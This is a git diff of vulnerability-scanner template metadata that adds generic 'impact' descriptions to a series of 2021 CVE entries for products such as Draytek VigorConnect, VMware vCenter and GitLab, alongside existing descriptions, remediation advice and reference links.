@@ -5,6 +5,8 @@ info: author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. + impact: | + An attacker can gain access to sensitive information, potentially leading to unauthorized access or data leakage. remediation: | Upgrade TCExam to a version higher than 14.8.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index fa7cd9e1f0..3a553059af 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B. reference: diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 054fa75bf0..39ddbd758f 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system. remediation: | Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3. reference: diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 2f09eb4547..5e6f622480 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 39b290fd00..621091abf8 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access to the router. remediation: | Update the router firmware to the latest version to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 5b03d8cd54..c015faa914 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. + impact: | + An attacker with authenticated access can gain unauthorized control over the affected device. remediation: | Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 3e443f5567..2299c8d83c 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher). reference: diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 4a4b37648e..dbb13bae77 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress Quiz and Survey Master plugin (7.1.14) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 5f845862ba..6e0f5ac0eb 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index cc7b6ddef1..4f27b3f99e 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 533ed50151..a43edaa579 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview". + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator. reference: diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 94a8b42689..0ee76fce60 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by MinIO to fix this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index da5b6ff56d..9d5bc4e38c 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: critical description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r 
diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index 6fdf26fe38..7c64b2ddc3 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -5,6 +5,8 @@ info: author: Adam Crosser,pwnhxl severity: high description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. remediation: Upgrade to version 4.7.9 or later. reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index d36f09bba2..0fefe22da3 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected reference: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC 
diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 7614877da1..c7ea7c36bb 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://x-stream.github.io/CVE-2021-21345.html diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 3d1a6cd115..71925c192c 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index dd77e79f93..7c1064af00 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml 
@@ -5,6 +5,8 @@ info: author: lotusdll severity: high description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system. remediation: This issue has been remediated in WordPress BuddyPress 7.2.1. reference: - https://github.com/HoangKien1020/CVE-2021-21389 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 7504730d05..cdc8475e0a 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: This is fixed in version 10.7.1. reference: - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 7704b83310..22a61e7e3b 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -7,6 +7,8 @@ info: description: | SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and execute java expressions and compromise the availability and integrity of the system. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 03eb0255b8..a80423ab4f 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -7,6 +7,8 @@ info: description: | ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + impact: | + An attacker can bypass authentication and gain unauthorized access to the router. remediation: | Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 84b6766692..fe6549bbdf 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12. reference: diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index af333276ef..f379605d02 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application. reference: diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 790bbd4238..acf5955387 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application. reference: diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 67cb755ed0..90a443af79 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index e04f578486..27a43d9aa7 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index fc3413e87a..9a28297cec 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks. remediation: | Upgrade the router firmware to the latest version provided by D-Link. reference: diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index 252a994146..f3616a2558 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device. remediation: | Apply the latest firmware update provided by Lantronix to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index ef9460bab1..f0862babc4 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index e41937800f..64bb755787 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 3e3707d769..1a88465a5f 100644 --- a/http/cves/2021/CVE-2021-21975.yaml 
+++ b/http/cves/2021/CVE-2021-21975.yaml @@ -5,6 +5,8 @@ info: author: luci severity: high description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 1fde947a09..f13f6611fe 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -8,6 +8,8 @@ info: VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index a9813fb595..15a25acdeb 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index 13adc4933a..96e744524b 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -5,6 +5,8 @@ info: author: PR3R00T severity: critical description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. + impact: | + Allows an attacker to upload and execute arbitrary files on the target system remediation: | Apply the necessary security patches or updates provided by VMware reference: diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 82c3b70e18..4b0e58ea22 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index cb6350a7b7..e8089be02b 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: high description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Apply the necessary patches or updates provided by VMWare to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 422b517aa4..68014e9aae 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml 
@@ -1,11 +1,13 @@ id: CVE-2021-22122 info: - name: FortiWeb - Cross-Site Scripting + name: FortiWeb - Cross Site Scripting author: dwisiswant0 severity: medium description: | FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points. + impact: | + Successful exploitation of this vulnerability can result in the compromise of sensitive user information, session hijacking. remediation: | Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb. reference: diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index e8fcc2023b..1e2722c3f2 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145. reference: diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 38b481b42f..19ddaa6f36 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml 
@@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected GitLab instance. remediation: | Upgrade to GitLab CE/EE version 13.10.3 or 13.11.1 to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 2e91a4bb49..3cc570cd1d 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -9,6 +9,8 @@ info: - CVE-2021-39935 - CVE-2021-22214 - CVE-2021-22175 + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system. remediation: | Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher). reference: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index f0e819e358..0715005537 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml 
@@ -5,6 +5,8 @@ info: author: pudsec severity: medium description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. remediation: | Upgrade Revive Adserver to version 5.1.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 68fb332a78..4c8c8c3a3d 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -5,6 +5,8 @@ info: author: tess,sullo severity: critical description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service. remediation: | Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 48afbdf66a..2117b77299 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml 
